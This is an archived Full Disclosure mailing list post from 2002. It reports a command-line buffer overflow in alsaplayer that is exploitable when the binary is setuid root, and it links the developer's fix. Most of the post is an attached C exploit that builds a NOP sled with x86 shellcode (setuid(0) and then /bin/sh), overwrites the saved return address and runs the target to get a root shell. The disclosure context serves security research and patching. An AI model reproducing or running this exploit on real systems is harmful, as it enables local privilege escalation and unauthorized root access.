Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Alsasound local b0f (not an issue if not setuid root)

From: dotslash () snosoft com (KF)
Date: Fri, 20 Sep 2002 10:42:27 -0400
This is a multi-part message in MIME format.
--------------000403030209070703060000
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

I noticed that it is very common in the troubleshooting of an 
application that uses alsa-sound to set the setuid bit on the binary in 
question. One example of this can be found in the archives of the 
alsaplayer mailing list: 
http://lists.tartarus.org/pipermail/alsaplayer-devel/2002-February/000656.html 
and
http://lists.tartarus.org/pipermail/alsaplayer-devel/2002-February/000657.html

I spoke to the developer of alsasound and he promptly fixed the 
problems. Although he does not condone the setuid bit on the alsasound 
program the author noted that some users choose to set the bit.

The fixes for the above problem can be found at: 
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/alsaplayer/alsaplayer/app/Main.cpp.diff?r1=1.66&r2=1.67

http://alsaplayer.org/changelog.php3

Wed Sep 18 11:52:43 CEST 2002
-----------------------------
* Code cleanups
* JACK related updates
* commandline buffer overflow fixes.
...


-KF





--------------000403030209070703060000
Content-Type: text/plain;
 name="alsaplayer-suid.c"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="alsaplayer-suid.c"

/* 
 * Alsaplayer exploit for a buffer overflow found by KF (snosoft.com) 
 * 
 * This program is not installed with special permissions by default. 
 * However, the author himself does recommend to do so under certain 
 * conditions:
 *
 * http://lists.tartarus.org/pipermail/alsaplayer-devel/2002-February/000656.html
 * http://lists.tartarus.org/pipermail/alsaplayer-devel/2002-February/000657.html
 *
 * Author: zillion[at]safemode.org (09/2002)
 *
 * Tested on Red Hat 7.3 linux with alsaplayer-devel-0.99.71-1
 *
 */

#include <unistd.h>
#include <sys/stat.h>
#include <string.h>

#define BUFFER_SIZE 1056
#define NOP 0x90
#define RET 0xbfffe440 

char shellcode[]=

"\xeb\x26\x5e\x31\xc0\x89\xc3\x89\xc1\x89\xc2\xb0\xa4\xcd\x80" 
"\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xd5\xff\xff\xff"
"\x2f\x62\x69\x6e\x2f\x73\x68"; 

void print_error(char * burb) { 
  printf(" Error: %s !\n",burb); exit(0); 
}

void usage(char *progname) {
  printf("\n*--- -- -  Alsaplayer b0f exploit - -- ---*\n");
  printf("\nDefault: %s  -f /path/to/alsaplayer",progname);
  printf("\nOption : %s  -o <offset>\n\n",progname);
  exit(0);
}

int main(int argc, char **argv){
  
  char buffer[BUFFER_SIZE];
  char file[30];
  long retaddress;
  int arg,offset=500;
  
  struct stat sbuf;
  
  if(argc < 2) { usage(argv[0]); }
  
  while ((arg = getopt (argc, argv, "f:o:")) != -1){ 
    switch (arg){ 
    case 'f': 
      strncpy(file,optarg,sizeof(file));
      if(stat(argv[2], &sbuf)) { print_error("No such file");}
      break; 
    case 'o':       
      offset = atoi(optarg);
      if(offset < 0) { print_error("Offset must be positive");}
      break; 
    default :       
      usage(argv[0]); 
    } 
  } 
  
  retaddress = (RET - offset);
  memset(buffer,NOP,BUFFER_SIZE);
  memcpy(buffer + BUFFER_SIZE - (sizeof(shellcode) + 8) ,shellcode,sizeof(shellcode) -1);
  
  /* Overwrite EBP and EIP */
  *(long *)&buffer[BUFFER_SIZE - 8]  = retaddress;
  *(long *)&buffer[BUFFER_SIZE - 4]  = retaddress;
  
  if(execl(file,file,"-p",buffer,NULL) != 0) {
    print_error("Could not execute alsaplayer ");
  }
  
  return 0;
  
}

--------------000403030209070703060000--
Previous By Date Next
Previous By Thread Next

Current thread: